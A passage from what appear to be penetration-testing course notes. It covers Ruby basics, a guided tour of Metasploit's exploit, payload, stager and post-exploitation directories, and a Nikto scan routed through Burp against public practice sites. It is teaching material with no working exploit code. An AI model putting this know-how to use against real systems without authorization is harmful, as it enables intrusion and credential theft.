  2567.  
  2568.  
  2569. - Changing Data Types: Data type conversion is an important concept in Ruby because it gives you flexibility while
  2570. working with different data types. Data type conversion is also known as type casting.
  2571.  
  2572.  
  2573.  
  2574. - Constants: Unlike variables, the values of constants remain fixed during the program interpretation. So if you
  2575. change the value of a constant, you will see a warning message.
  2576.  
  2577.  
  2578.  
  2579.  
  2580. - Multiple Line String Variable, Interpolation, and Regular Expressions
  2581.  
  2582. - A multiple line string variable lets you assign the value to the string variable through multiple lines.
  2583.  
  2584. ---------------------------Type This-----------------------------------
  2585. infosecaddicts = <<mark
  2586. welcome
  2587. to the
  2588. best
  2589. metasploit
  2590. course
  2591. on the
  2592. market
  2593. mark
  2594. puts infosecaddicts
  2595. -----------------------------------------------------------------------
  2596.  
  2597.  
  2598. - Interpolation lets you evaluate any placeholder within a string, and the placeholder is replaced with the value that
  2599. it represents. So whatever you write inside #{ } will be evaluated and the value will be replaced at that position.
  2600. Examine the following example to understand how interpolation works in Ruby.
  2601.  
  2602. References:
  2603. https://stackoverflow.com/questions/10869264/meaning-of-in-ruby
  2604.  
  2605.  
  2606. ---------------------------Type This-----------------------------------
  2607. a = 4
  2608. b = 6
  2609. puts "a * b = a*b"
  2610. puts " #{a} * #{b} = #{a*b} "
  2611. person = "Joe McCray"
  2612. puts "IT Security consultant person"
  2613. puts "IT Security consultant #{person}"
  2614. -----------------------------------------------------------------------
  2615.  
  2616. - Notice that the placeholders inside #{ } are evaluated and they are replaced with their values.
  2617.  
  2618.  
  2619.  
  2620.  
  2621.  
  2622. - Character classes
  2623. ---------------------------Type This-----------------------------------
  2624. infosecaddicts = "I Scanned 45 hosts and found 500 vulnerabilities"
  2625. "I love metasploit and what it has to offer!".scan(/[lma]/) {|y| puts y}
  2626. "I love metasploit and what it has to offer!".scan(/[a-m]/) {|y| puts y}
  2627. -----------------------------------------------------------------------
  2628.  
  2629.  
  2630. - Arrays, Push and Pop, and Hashes
  2631.  
  2632.  
  2633. - In the following example, numbers is an array that holds 6 integer numbers.
  2634.  
  2635.  
  2636. ---------------------------Type This-----------------------------------
  2637. numbers = [2,4,6,8,10,100]
  2638. puts numbers[0]
  2639. puts numbers[4]
  2640. numbers[2] = 150
  2641. puts numbers
  2642. -----------------------------------------------------------------------
  2643.  
  2644.  
  2645.  
  2646. - Now we will show how you can implement a stack using an array in Ruby. A stack has two operations - push and pop.
  2647.  
  2648.  
  2649. ---------------------------Type This-----------------------------------
  2650. framework = []
  2651. framework << "modules"
  2652. framework << "exploits"
  2653. framework << "payloads"
  2654. framework.pop
  2655. framework.shift
  2656. -----------------------------------------------------------------------
  2657.  
  2658. - Hash is a collection of elements, which is like the associative array in other languages. Each element has a key
  2659. that is used to access the element.
  2660.  
  2661.  
  2662. - Hash is a Ruby object that has its built-in methods. The methods make it easy to work with hashes.
  2663. In this example, 'metasploit' is a hash. 'exploits', 'microsoft', 'Linux' are the keys, and the following are the
  2664. respective values: 'what module should you use', 'Windows XP' and 'SSH'.
  2665.  
  2666. ---------------------------Type This-----------------------------------
  2667. metasploit = {'exploits' => 'what module should you use', 'microsoft' => 'Windows XP', 'Linux' => 'SSH'}
  2668. print metasploit.size
  2669. print metasploit["microsoft"]
  2670. metasploit['microsoft'] = 'redhat'
  2671. print metasploit['microsoft']
  2672. -----------------------------------------------------------------------
  2673.  
  2674.  
  2675.  
  2676. - Writing Ruby Scripts
  2677.  
  2678.  
  2679. - Let's take a look at one of the ruby modules and see exactly now what it is doing. Now explain to me exactly what
  2680. this program is doing. If we take a look at the ruby program what you find is that it is a TCP port scanner that
  2681. someone made to look for a specific port. The port that it is looking for is port 21 FTP.
  2682. ---------------------------Type This-----------------------------------
  2683. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  2684. ls
  2685. -----------------------------------------------------------------------
  2686.  
  2687.  
  2688.  
  2689. ###########################
  2690. # Metasploit Fundamentals #
  2691. ###########################
  2692.  
  2693. - Let's take a little look at Metasploit Framework
  2694.  
  2695. - First, we should take note of the different directories, the Modular Architecture.
  2696.  
  2697. The modules that make up the Modular Architecture are
  2698. Exploits
  2699. Auxiliary
  2700. Payload
  2701. Encoder
  2702. Nops
  2703.  
  2704.  
  2705. Important directories to keep in mind for Metasploit, in case we'd like to edit different modules, or add our own,
  2706.  
  2707. are
  2708.  
  2709. Modules
  2710. Scripts
  2711. Plugins
  2712. External
  2713. Data
  2714. Tools
  2715.  
  2716. - Let's take a look inside the Metasploit directory and see what's the
  2717. ---------------------------Type This-----------------------------------
  2718. cd ~/toolz/metasploit
  2719. ls
  2720. -----------------------------------------------------------------------
  2721.  
  2722.  
  2723.  
  2724. - Now let's take a look inside the Modules directory and see what's there.
  2725. ---------------------------Type This-----------------------------------
  2726. cd ~/toolz/metasploit/modules
  2727. ls
  2728. -----------------------------------------------------------------------
  2729.  
  2730.  
  2731. The auxiliary directory is where the things like our port-scanners will be, or any module that we can run that does
  2732. not necessarily need to - have a shell or session started on a machine.
  2733.  
  2734. The exploits directory has our modules that we need to pop a shell on a box.
  2735. The external directory is where we can see all of the modules that use external libraries from tools Metasploit uses
  2736. like Burp Suite
  2737. - Let's take a look at the external directory
  2738. ---------------------------Type This-----------------------------------
  2739. cd ~/toolz/metasploit/external
  2740. ls
  2741. -----------------------------------------------------------------------
  2742.  
  2743. - Our data directory holds helper modules for Metasploit to use with exploits or auxiliary modules.
  2744. ---------------------------Type This-----------------------------------
  2745. cd ~/toolz/metasploit/data
  2746. ls
  2747. -----------------------------------------------------------------------
  2748.  
  2749. - For example, the wordlist directory holds files that have wordlists in them for brute-forcing logins or doing DNS
  2750. brute-forcing
  2751. ---------------------------Type This-----------------------------------
  2752. cd ~/toolz/metasploit/data/wordlists
  2753. ls
  2754. -----------------------------------------------------------------------
  2755.  
  2756. - The Meterpreter directory inside of the data directory houses the DLLs used for the functionality of Meterpreter
  2757. once a session is created.
  2758. ---------------------------Type This-----------------------------------
  2759. cd ~/toolz/metasploit/data/meterpreter
  2760. ls
  2761. -----------------------------------------------------------------------
  2762.  
  2763. - The scripts inside the scripts/Meterpreter directory are scripts that Meterpreter uses for post-exploitation, things
  2764. like escalating privileges and dumping hashes.
  2765.  
  2766. These are being phased out, though, and post-exploitation modules are what is being more preferred.
  2767. The next important directory that we should get used to is the 'tools' directory. Inside the tools directory we'll
  2768. find a bunch of different ruby scripts that help us on a pentest with things ranging from creating a pattern of code
  2769. for creating exploits, to a pattern offset script to find where at in machine language that we need to put in our
  2770. custom shellcode.
  2771.  
  2772. The final directory that we'll need to keep in mind is the plugins directory, which houses all the modules that have
  2773. to do with other programs to make things like importing and exporting reports simple.
  2774. Now that we have a clear understanding of what all of the different directories house, we can take a closer look at
  2775. the exploits directory and get a better understanding of how the directory structure is there, so if we make our own
  2776. modules we're going to have a better understanding of where everything needs to go.
  2777. ---------------------------Type This-----------------------------------
  2778. cd ~/toolz/metasploit/modules/exploits
  2779. ls
  2780. -----------------------------------------------------------------------
  2781.  
  2782.  
  2783. - The exploits directory is split up into several different directories, each one housing exploits for different types
  2784. of systems. I.E. Windows, Unix, OSX, dialup and so on.
  2785. Likewise, if we were to go into the 'windows' directory, we're going to see that the exploits have been broken down
  2786. into categories of different types of services/programs, so that you can pick out an exploit specifically for the
  2787. service you're trying to exploit. Let's dig a little deeper into the auxiliary directory and see what all it holds
  2788. for us.
  2789. ---------------------------Type This-----------------------------------
  2790. cd ~/toolz/metasploit/modules/auxiliary/
  2791. ls
  2792. -----------------------------------------------------------------------
  2793.  
  2794.  
  2795. - And a little further into the directory, let's take a look at what's in the scanner directory
  2796. ---------------------------Type This-----------------------------------
  2797. cd ~/toolz/metasploit/modules/auxiliary/scanner/
  2798. ls
  2799. -----------------------------------------------------------------------
  2800.  
  2801.  
  2802. - And one more folder deeper into the structure, let's take a look in the portscan folder
  2803. ---------------------------Type This-----------------------------------
  2804. cd ~/toolz/metasploit/modules/auxiliary/scanner/portscan
  2805. ls
  2806. -----------------------------------------------------------------------
  2807.  
  2808. - If we run 'cat tcp.rb' we'll find that this module is simply a TCP scanner that will find tcp ports that are open
  2809. and report them back to us in a nice, easily readable format.
  2810.  
  2811. cat tcp.rb
  2812.  
  2813.  
  2814.  
  2815. - Just keep in mind that all of the modules in the auxiliary directory are there for information gathering and for use
  2816. once you have a session on a machine.
  2817. Taking a look at the payload directory, we can see all the available payloads, which are what run after an exploit
  2818. succeeds.
  2819. ---------------------------Type This-----------------------------------
  2820. cd ~/toolz/metasploit/modules/payloads/
  2821. ls
  2822. -----------------------------------------------------------------------
  2823.  
  2824.  
  2825. - There are three different types of payloads: single, stagers, and staged. Each type of payload has a different
  2826. application for it to be used as.
  2827. Single payloads do everything you need them to do at one single time, so they call a shell back to you and let you
  2828. do everything once you have that shell calling back to you.
  2829. Stagers are required for limited payload space so that the victim machine will call back to your attack box to get
  2830. the rest of the instructions on what it's supposed to do. The first stage of the payload doesn't require all that
  2831. much space to just call back to the attacking machine to have the rest of the payload sent to it, mainly being used
  2832. to download Stages payloads.
  2833.  
  2834.  
  2835. - Stages are downloaded by stagers and typically do complex tasks, like VNC sessions, Meterpreter sessions, or bind
  2836. shells.
  2837. ---------------------------Type This-----------------------------------
  2838. cd singles
  2839. cd windows
  2840. ls
  2841. -----------------------------------------------------------------------
  2842.  
  2843.  
  2844. - We can see several different payloads here that we can use on a windows system. Let's take a look at adduser.rb and
  2845. see what it actually does.
  2846. ---------------------------Type This-----------------------------------
  2847. cat adduser.rb
  2848. -----------------------------------------------------------------------
  2849.  
  2850. Which when looking at the code, we can see that it will add a new user called "Metasploit" to the machine and give
  2851. the new user "Metasploit" a password of "Metasploit$1" Further down in the file we can actually see the command that
  2852. it gives Windows to add the user to the system.
  2853.  
  2854.  
  2855. - Stagers just connect to victim machine back to yours to download the Stages payload, usually with a
  2856.  
  2857. windows/shell/bind_tcp or windows/shell/reverse_tcp
  2858. ---------------------------Type This-----------------------------------
  2859. cd ../../stagers
  2860. ls
  2861. -----------------------------------------------------------------------
  2862.  
  2863.  
  2864.  
  2865. - Again, we can see that we have stagers for multiple systems and code types.
  2866. ---------------------------Type This-----------------------------------
  2867. ls windows/
  2868. -----------------------------------------------------------------------
  2869.  
  2870.  
  2871. As you can see, the stagers are mainly just to connect to the victim, to setup a bridge between us and the victim
  2872. machine, so we can upload or download our stage payloads and execute commands.
  2873. Lastly, we can go to our stages directory to see what all payloads are available for us to send over for use with
  2874. our stagers...
  2875. ---------------------------Type This-----------------------------------
  2876. cd ../stages
  2877. ls
  2878. -----------------------------------------------------------------------
  2879.  
  2880.  
  2881. Again, we can see that our stages are coded for particular operating systems and languages.
  2882. We can take a look at shell.rb and see the shellcode that would be put into the payload that would be staged on the
  2883. victim machine which would be encoded to tell the victim machine where to connect back to and what commands to run,
  2884. if any.
  2885.  
  2886. - Other module directories include nops, encoders, and post. Post modules are what are used in sessions that have
  2887. already been opened in meterpreter, to gain more information on the victim machine, collect hashes, or even tokens,
  2888. so we can impersonate other users on the system in hopes of elevating our privileges.
  2889. ---------------------------Type This-----------------------------------
  2890. cd ../../../post/
  2891. ls
  2892. cd windows/
  2893. ls
  2894. -----------------------------------------------------------------------
  2895.  
  2896.  
  2897. Inside the windows directory we can see all the post modules that can be run, capture is a directory that holds all
  2898. the modules to load keyloggers, or grab input from the victim machine. Escalate has modules that will try to
  2899. escalate our privileges. Gather has modules that will try to enumerate the host to get as much information as
  2900. possible out of it. WLAN directory holds modules that can pull down WiFi access points that the victim has in
  2901. memory/registry and give you the AP names as well as the WEP/WPA/WPA2 key for the network.
  2902.  
  2903.  
  2904. ##############################
  2905. ----------- ############### # Day 5: Advanced Burp Suite ################ -----------
  2906. ##############################
  2907.  
  2908. Taking Burp to the next level:
  2909.  
  2910. Burp Process:
  2911. https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/#testing-for-alternative-content
  2912.  
  2913. Web App Security Target Test websites:
  2914. http://zero.webappsecurity.com/
  2915. http://demo.testfire.net/
  2916. http://www.webscantest.com/
  2917.  
  2918.  
  2919. ###################
  2920. # Nikto with Burp #
  2921. # in Linux #
  2922. ###################
  2923.  
  2924. cd ~/toolz/
  2925.  
  2926. rm -rf nikto*
  2927.  
  2928. git clone https://github.com/sullo/nikto.git Nikto2
  2929.  
  2930. cd Nikto2/program
  2931.  
  2932. perl nikto -h http://zero.webappsecurity.com -useproxy http://localhost:8080/
  2933.  
  2934. -----------------
  2935. Masking the Nikto header reference:
  2936. http://carnal0wnage.attackresearch.com/2009/09/btod-nikto-thru-burp-masking-nikto.html
  2937.  
  2938. Burp WSDL testing:
  2939. https://nileshsapariya.blogspot.com/2017/05/auditing-soap-web-services-with.html
  2940. https://developer.salesforce.com/forums/?id=906F0000000Az9mIAC
  2941.  
  2942. SoapUI Testing:
  2943. https://www.soapui.org/security-testing/getting-started.html
  2944.  
  2945. API Testing:
  2946. https://www.redteamsecure.com/api-enumeration-with-redteam-securitys-tool-purl/
  2947.  
  2948.  
  2949. References:
  2950. https://2015.appsec.eu/wp-content/uploads/2015/09/owasp-appseceu2015-haddix.pdf
Add Comment
Please, Sign In to add comment